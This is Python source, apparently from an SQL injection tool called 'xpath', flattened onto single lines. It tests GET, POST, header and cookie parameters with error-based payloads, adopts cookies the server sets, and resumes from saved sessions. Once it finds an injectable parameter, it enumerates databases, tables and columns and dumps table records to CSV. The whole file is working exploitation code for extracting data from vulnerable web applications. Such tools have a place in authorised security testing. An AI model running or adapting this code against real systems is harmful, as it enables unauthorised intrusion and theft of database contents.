def _pprint_records(self, field_names, database="", table_name="", table="", columns=None): group_by_columns = "" if columns: group_by_columns = ",".join([f"`{i.strip()}`" for i in columns]) cursor_or_list = session.fetch_from_table( session_filepath=self.session_filepath, table_name=table_name, group_by_columns=group_by_columns, ) # this time get the cursor to dump data into csv file.. ok = session.dump_to_csv( cursor=cursor_or_list, filepath=self.session_filepath, database=database, table=table, ) cursor_or_list = session.fetch_from_table( session_filepath=self.session_filepath, table_name=table_name, group_by_columns=group_by_columns, ) obj = prettifier(cursor_or_list, field_names, header=True) data = obj.data entries = obj.entries logger.success(f"Database: {database}") logger.success(f"Table: {table}") logger.success(f"[{entries} entries]") logger.success(f"{data}")
def search(self, db="", tbl="", col="", search_type=""): index = 0 _temp = [] is_resumed = False fetched_data = {} SearchResponse = collections.namedtuple( "SearchResponse", ["fetched", "count", "results"], ) if self._dbms and self._dbms == "PostgreSQL": logger.warning(f"Search is not implemeted yet for PostgreSQL..") return SearchResponse(fetched=False, count=0, results=[]) payloads = self._search_payloads(db=db, tbl=tbl, col=col, search_type=search_type) self._table_search = payloads.table_to_generate try: fetched_data = session.fetch_from_table( session_filepath=self.session_filepath, table_name=self._table_search, cursor=False, ) if fetched_data: is_resumed = True except Exception as error: pass remainder = 0 retval = self._extact(payloads=payloads.for_count) if retval.is_injected: found_records = int(retval.result) logger.info("used SQL query returns %d entries" % (found_records)) if found_records == 0: if search_type == "database": logger.warning(f"no databases LIKE '{db}' found") if search_type == "table": if not db: logger.warning( f"no databases have tables LIKE '{tbl}'") if db: logger.warning( f"no tables LIKE '{tbl}' in database '{db}'") logger.warning( f"no databases contain any of the provided tables") if search_type == "column": if not tbl and not db: logger.warning( f"no databases have tables containing columns LIKE '{col}'" ) if not tbl and db: logger.warning( f"no tables contain columns LIKE '{tbl}' in database '{db}'" ) if not db and tbl: logger.warning( f"no databases have tables containing columns LIKE '{col}' for table '{tbl}'" ) if db and tbl: logger.warning( f"unable to retrieve column names for table '{tbl}' in database '{db}'" ) logger.warning( f"no databases have tables containing any of the provided columns" ) return SearchResponse(fetched=False, count=0, results=[]) if is_resumed: for entry in fetched_data: index = entry.get("index") name = entry.get("value") _type = entry.get("search_type") _temp.append(name) logger.info(f"resumed: {name}") if search_type == "column": remainder_value = 3 if search_type == "table": remainder_value = 2 if search_type == "database": remainder_value = 1 remainder = len(fetched_data) % remainder_value fetched_records = _temp _temp = self._format_results(_temp, remainder_value) if remainder > 0: index -= 1 fetched_records = fetched_records[-remainder:] _temp.pop() if remainder > 0: records = self._format_results(fetched_records, remainder_value) else: records = [] should_fetch = True if is_resumed: if index == found_records: should_fetch = False if should_fetch: retval = self._extact(payloads=payloads.for_dump) if retval.is_injected: payload = retval.payload payloads = self._generate_search_dump_payloads( count=found_records, payload=payload, index=index) if not is_resumed: session.generate_table( session_filepath=self.session_filepath, query=TBL_SEARCH.format(name=self._table_search), ) response_data = self._extract_search_results( payloads=payloads, database=db, table=tbl, search_type=search_type, records=records, position=index, ) if response_data.is_fetched: _temp.extend(response_data.result) self._pprint_search_results(search_type, _temp) return SearchResponse(fetched=True, count=found_records, results=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}" ) else: message = f"tested with '{count}' queries, unable to find working SQL query." logger.critical(message) else: self._pprint_search_results(search_type, _temp) return SearchResponse(fetched=True, count=found_records, results=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return SearchResponse(fetched=False, count=0, results=[])
def tbl_names(self, db=""): index = 0 _temp = [] is_resumed = False fetched_data = {} _temp_payloads = [] TablesResponse = collections.namedtuple( "TablesResponse", ["fetched", "count", "database", "tables"]) if db: dump_payloads = [] [dump_payloads.extend(v) for _, v in PAYLOADS_TBLS_NAMES.items()] encode_string = to_hex(db, dbms=self._dbms) if self._dbms: dump_payloads = PAYLOADS_TBLS_NAMES.get( self._dbms, dump_payloads) for entry in dump_payloads: if self._dbms and self._dbms.startswith("Microsoft"): if "sysobjects" in entry: data = entry.format(db=db.strip(), db1=db.strip()) else: data = entry.format(db=encode_string, db1=encode_string) else: data = entry.format(db=encode_string) _temp_payloads.append(data) try: fetched_data = session.fetch_from_table( session_filepath=self.session_filepath, table_name=db, cursor=False, ) if fetched_data: is_resumed = True except Exception as error: pass logger.info("fetching tables for database: '%s'" % (db)) retval = self._tbl_count(db=db) if retval.is_injected: tbl_count = int(retval.result) if tbl_count != 0: logger.info("used SQL query returns %d entries" % (tbl_count)) if tbl_count == 0: logger.warning( "used SQL query returns %d entries for database: '%s'" % (tbl_count, db)) return TablesResponse(fetched=False, count=tbl_count, database=db, tables=[]) if is_resumed: for entry in fetched_data: name = entry.get("tblname") if name not in _temp: _temp.append(name) logger.info(f"resumed: '{name}'") index += 1 should_fetch = True if is_resumed: if len(fetched_data) == tbl_count: should_fetch = False if should_fetch: payloads = self._generat_payload(payloads_list=_temp_payloads) retval = self._extact(payloads=payloads) if retval.is_injected: payload = retval.payload payloads = self._generate_tbl_payloads(tbl_count=tbl_count, payload=payload, index=index) if not is_resumed: session.generate_table( session_filepath=self.session_filepath, query=DB_TABLES.format(name=db, tbl_name=db), ) response_data = self._extract_tbls(payloads=payloads, database=db) if response_data.is_fetched: _temp.extend(response_data.result) self._pprint_tables( cursor_or_list=_temp, field_names="Tables", database=db, ) return TablesResponse(fetched=True, count=tbl_count, database=db, tables=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}" ) else: message = f"tested with '{count}' queries, unable to find working SQL query." logger.critical(message) else: self._pprint_tables( cursor_or_list=_temp, field_names="Tables", database=db, ) return TablesResponse(fetched=True, count=tbl_count, database=db, tables=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return TablesResponse(fetched=False, count=0, database="", tables=_temp)
def perform(self): vulns = [] Response = collections.namedtuple( "Response", [ "is_vulnerable", "dbms", "payloads", "filepath", "cookies", "headers", "injection_type", "injected_param", "session_filepath", "recommended_payload", "recommended_payload_type", ], ) attemps_counter = 0 session_data = [] tested_payloads = [] successful_payloads = [] is_resumed = False filepath = None target_info = self._parse_target() set_cookie = "" set_headers = "" try: logger.notice("testing connection to the target URL.") resp = request.perform( self.url, data=self.data, headers=self.headers, use_requests=False, connection_test=True, proxy=self._proxy, ) if "Set-Cookie" in list(resp.headers.keys()): set_cookie = (", ".join(resp.headers.get_all("Set-Cookie")) if hasattr(resp.headers, "get_all") else resp.headers.get("Set-Cookie")) set_cookie = re.sub(r"(?is)path=/", "", set_cookie) _show_slice = set_cookie.rstrip() if len(set_cookie) > 20: _show_slice = f"{set_cookie[0:14]}....{set_cookie[-10:-2]}" question = logger.read_input( f"you have not declared cookie(s), while server wants to set its own ('{_show_slice}'). Do you want to use those [Y/n] ", batch=self._batch, user_input="Y", ) if question in ["", "y"]: if "," in set_cookie: set_cookie = "".join([ i.strip().replace("path=/", "").strip() for i in set_cookie.split(",") ]) set_cookie = ";".join(set_cookie.split(";")) set_cookie = f"Cookie: {set_cookie}" if (not self.headers or self.headers and "cookie" not in self.headers.lower()): self.headers += set_cookie except Exception as error: logger.critical( "Xpath was not able to establish connection. try checking with -v set to 5." ) logger.error(error) sys.exit(0) payloads_list = prepare_payloads( prefixes=PREFIX, suffixes=SUFFIX, payloads=PAYLOADS, techniques=self._techniques, ) try: table_name = "tbl_payload" session_data = session.fetch_from_table( session_filepath=self._session_filepath, table_name=table_name, cursor=False, ) if session_data: is_resumed = True is_questioned = False for pay in session_data: vulns.append({ "injection_type": f"({pay.get('parameter')})", "attempts": pay.get("payload_attemps"), "payload": pay.get("payload"), "title": pay.get("payload_type"), "order": pay.get("payload_order"), "regex": pay.get("regex"), "injected_param": pay.get("param").replace("*", ""), "dbms": pay.get("dbms"), }) except Exception as error: pass if not target_info.params: logger.critical( "no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')." ) logger.end("ending") sys.exit(0) if not vulns: params = target_info.params injection_type = target_info.injection_type is_custom_injection = target_info.is_custom_injection end_detection_phase = False is_injected = False successful_payload_prefix = "" vulnerable_param = "" unknown_error_counter = 0 dbms = "" for entry in params: param = entry.get("key") param_value = entry.get("value") if is_custom_injection and not param_value.endswith("*"): continue sep = ": " if "header" in injection_type.lower() else "=" injectable_param = (f"{param}{sep}{param_value}" if param_value else f"{param}{sep}") resp = self.is_injectable( self.url, self.data, self.headers, param=param, injectable_param=injectable_param, injection_type=injection_type, ) if not dbms: dbms = resp.dbms is_injectable = resp.injectable logger.info( f"testing for SQL injection on {injection_type} parameter '{param if not is_custom_injection else '#1*'}'" ) next_param_test = False for entry in payloads_list: backend = entry.get("back_end") title = entry.get("title") if dbms and dbms.lower() != backend.lower(): logger.debug(f"Skipped '{title}'") continue regex = entry.get("regex") order = entry.get("order") payloads = entry.get("payloads") logger.info(f"testing '{title}'") index = 0 if successful_payload_prefix: payloads = [ pl for pl in payloads if pl.prefix == successful_payload_prefix ] while index < len(payloads): url = self.url data = self.data headers = self.headers obj = payloads[index] payload = obj.string prefix = obj.prefix suffix = obj.suffix logger.payload(payload) it = self._injection_type.upper() if "HEADER" in it or "COOKIE" in it: headers = prepare_injection_payload( text=self.headers, payload=payload, param=injectable_param, unknown_error_counter=unknown_error_counter, ) if "GET" in it: url = prepare_injection_payload( text=self.url, payload=payload, param=injectable_param, unknown_error_counter=unknown_error_counter, ) if "POST" in it: data = prepare_injection_payload( text=self.data, payload=payload, param=injectable_param, unknown_error_counter=unknown_error_counter, ) try: if not is_injected: attemps_counter += 1 response = request.inject_payload( url=url, regex=REGEX_TESTS, data=data, headers=headers, use_requests=self._use_requests, proxy=self._proxy, ) except KeyboardInterrupt as e: question = logger.read_input( "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(q)uit] " ) if question and question == "e": end_detection_phase = True break if question and question == "s": break if question and question == "n": next_param_test = True break if question and question.lower() == "q": logger.error("user quit") logger.end("ending") sys.exit(0) except Exception as e: unknown_error_counter += 1 else: if response.ok: is_injected = True successful_payload_prefix = prefix _ = session.generate( session_filepath=self._session_filepath) with open(self._target_file, "w") as fd: fd.write( f"{self.url} ({'GET' if 'cookie' in injection_type.lower() else injection_type}) # {' '.join(sys.argv)}" ) if param: message = f"{injection_type} parameter '{DIM}{white}{param}{BRIGHT}{black}' is '{DIM}{white}{title}{BRIGHT}{black}' injectable" else: message = f"{injection_type} parameter is '{DIM}{white}{title}{BRIGHT}{black}' injectable" logger.notice(message) vulns.append({ "injection_type": f"({injection_type})", "attempts": attemps_counter, "payload": payload, "title": title, "order": order, "regex": regex, "injected_param": injectable_param.replace("*", ""), "dbms": dbms, }) _ = session.dump( session_filepath=self._session_filepath, query=PAYLOAD_STATEMENT, values=( str(title), order, attemps_counter, payload, injection_type, regex, "test", injectable_param, dbms, ), ) vulnerable_param = param break index += 1 if end_detection_phase or next_param_test: break if not is_injected: _param = f"{DIM}{white}'{param}'{BRIGHT}{black}" logger.notice( f"{injection_type} parameter {_param} does not seem to be injectable" ) if end_detection_phase: if not is_injected: logger.critical( "all tested parameters do not appear to be injectable" ) break if is_injected and not next_param_test: if vulnerable_param: message = f"{injection_type} parameter '{vulnerable_param}' is vulnerable. Do you want to keep testing the others (if any)? [y/N] " else: message = f"{injection_type} parameter is vulnerable. Do you want to keep testing the others (if any)? [y/N] " question = logger.read_input(message, batch=self._batch, user_input="N") if question and question == "n": break else: logger.debug( "skipping tests as we already have injected the target..") if vulns and isinstance(vulns, list): vulns = sorted( vulns, key=lambda k: k.get("order") if k.get("order") else k.get("payload_order"), reverse=True, ) dbms = vulns[0].get("dbms") injection_type = vulns[0].get("injection_type") injected_param = vulns[0].get("injected_param") recommended_payload = vulns[0].get("payload") recommended_payload = clean_up_payload( payload=recommended_payload, replaceable_string="0x72306f746833783439") recommended_payload_type = vulns[0].get("regex") param = injected_param if not param and self.headers: params = extract_params(self.headers, injection_type=injection_type) payload = prepare_injection_payload(self.headers, recommended_payload, param="").replace( "%20", " ") param = "" for p in params: sep = ": " if "header" in injection_type.lower() else "=" _param = f"{p.get('key')}{sep}{p.get('value').replace('*', '')}" _ = f"{_param}{recommended_payload}" if _ in payload.strip(): param = _param break if not is_resumed: message = f"xpath identified the following injection point(s) with a total of {attemps_counter} HTTP(s) requests:" if is_resumed: message = "xpath resumed the following injection point(s) from stored session:" logger.success(message) if param: sep = ":" if "header" in injection_type.lower() else "=" _param = param.split(sep)[0] if sep in param else param injection_type = f"{_param} {injection_type}" logger.success(f"---\nParameter: {injection_type}") text = " Type: error-based\n Title: {title}\n Payload: {_payload}" ok = [] for v in vulns: title = v.get("title").strip() pl = v.get("payload").strip() if pl[0].lower() in ["a", "o"]: pl = f" {pl}" if param and "HEADER" not in injection_type.upper(): pl = f"{param}{pl}" ok.append(text.format(title=title, _payload=pl)) logger.success("\n\n".join(ok)) logger.success("---") resp = Response( is_vulnerable=True, payloads=vulns, dbms=dbms, filepath=self._filepath, cookies=set_cookie, headers=set_headers, injected_param=injected_param, injection_type=self._injection_type, session_filepath=self._session_filepath, recommended_payload=recommended_payload, recommended_payload_type=recommended_payload_type, ) else: resp = Response( is_vulnerable=False, dbms=dbms, payloads=vulns, filepath=None, cookies=set_cookie, headers=set_headers, injected_param=None, session_filepath=None, injection_type=None, recommended_payload=None, recommended_payload_type=None, ) return resp
def dbs_names(self): is_resumed = False index = 0 fetched_data = {} _temp = [] DatabasesResponse = collections.namedtuple( "DatabasesResponse", ["fetched", "count", "databases"]) try: fetched_data = session.fetch_from_table( session_filepath=self.session_filepath, table_name="tbl_databases", cursor=False, ) if fetched_data: is_resumed = True except Exception as error: pass logger.info("fetching database names") retval = self._dbs_count if retval.is_injected: dbs_count = int(retval.result) if dbs_count != 0: logger.info("used SQL query returns %d entries" % (dbs_count)) if dbs_count == 0: logger.warning( "used SQL query returns %d entries for database names.." % (dbs_count)) return DatabasesResponse(fetched=False, count=dbs_count, databases=[]) if is_resumed: for entry in fetched_data: name = entry.get("dbname") if name not in _temp: _temp.append(name) # logger.info(f"resumed: '{name}'") index += 1 should_fetch = True if is_resumed: if len(fetched_data) == dbs_count: should_fetch = False if should_fetch: payloads = self._generat_payload( payloads_list=PAYLOADS_DBS_NAMES) retval = self._extact(payloads=payloads) if retval.is_injected: payload = retval.payload payloads = self._generate_dbs_payloads(dbs_count=dbs_count, payload=payload, index=index) response_data = self._extract_dbs(payloads=payloads) if response_data.is_fetched: _temp.extend(response_data.result) self._available_dbs(dbs_count, _temp) return DatabasesResponse(fetched=True, count=dbs_count, databases=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}" ) else: message = f"tested with '{count}' queries, unable to find working SQL query." logger.critical(message) else: self._available_dbs(dbs_count, _temp) return DatabasesResponse(fetched=True, count=dbs_count, databases=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return DatabasesResponse(fetched=False, count=0, databases=_temp)
def data_dump(self, db="", tbl="", cols=""): index = 0 _temp = [] is_resumed = False fetched_data = {} _temp_payloads = [] fetched_records = [] cols = self._clean_up_cols(cols) count = "{0:03d}".format(len(cols)) RecordsResponse = collections.namedtuple( "RecordsResponse", ["fetched", "count", "database", "table", "columns", "records"], ) if db and tbl and cols and isinstance(cols, list): dump_payloads = [] [dump_payloads.extend(v) for _, v in PAYLOADS_RECS_DUMP.items()] test_column = "0x72306f746833783439" if self._dbms: dump_payloads = PAYLOADS_RECS_DUMP.get(self._dbms, dump_payloads) test_column = "1337" for i in dump_payloads: data = i.format(col=test_column, db=db, tbl=tbl) _temp_payloads.append(data) try: tmp_table_name = f"{count}_{tbl.strip()}_tmp" fetched_data = session.fetch_from_table( session_filepath=self.session_filepath, table_name=tmp_table_name, group_by_columns="`index`,`column_name`,`column_value`", cursor=False, ) if fetched_data: is_resumed = True except Exception as error: pass logger.info( "fetching column(s) '%s' for table '%s' in database: '%s'" % (", ".join(cols), tbl, db)) last_seen = 0 remainder = 0 retval = self._data_count(db=db, tbl=tbl) if retval.is_injected: data_count = int(retval.result) if data_count != 0: logger.info("used SQL query returns %d entries" % (data_count)) if data_count == 0: logger.warning( "used SQL query returns %d entries of columns '%s' for table '%s' in database '%s'" % (data_count, ", ".join(cols), tbl, db)) return RecordsResponse( fetched=False, count=data_count, database=db, table=tbl, columns=cols, records=[], ) if is_resumed: _temp = fetched_data for entry in fetched_data: last_seen = index = entry.get("index") value = entry.get("column_value") # logger.info(f"resumed: '{value}'") fetched_records.append(value) remainder = len(fetched_data) % len(cols) if remainder > 0: index -= 1 last_seen = last_seen - 1 fetched_records = fetched_records[-remainder:] should_fetch = True if is_resumed: if index == data_count: should_fetch = False if should_fetch: # logger.info(f"resumed fetching from '{index+1}' record..") payloads = self._generat_payload(payloads_list=_temp_payloads) retval = self._extact(payloads=payloads) if retval.is_injected: payload = clean_up_payload(payload=retval.payload, replace_with="{col}") payloads = self._generate_data_payloads( data_count=data_count, payload=payload, cols=cols, index=index) if is_resumed and remainder > 0: remaing_records = payloads[last_seen][remainder:] payloads.update({last_seen: remaing_records}) if not is_resumed: self.__generate_records_tables(tbl=tbl, cols=cols, count=count) response_data = self._extract_data( payloads=payloads, table=tbl, columns=cols, fetched_records=fetched_records, count=count, ) if response_data.is_fetched: _temp.extend(response_data.result) table_name = f"{count}_{tbl}_data" self._pprint_records( field_names=", ".join(cols), database=db, table_name=table_name, table=tbl, columns=cols, ) return RecordsResponse( fetched=True, count=data_count, database=db, table=tbl, columns=cols, records=_temp, ) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}" ) else: message = f"tested with '{count}' queries, unable to find working SQL query." logger.critical(message) else: table_name = f"{count}_{tbl}_data" self._pprint_records( field_names=", ".join(cols), database=db, table_name=table_name, table=tbl, columns=cols, ) return RecordsResponse( fetched=True, count=data_count, database=db, table=tbl, columns=cols, records=_temp, ) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return RecordsResponse( fetched=False, count=0, database=None, table=None, columns=None, records=None, )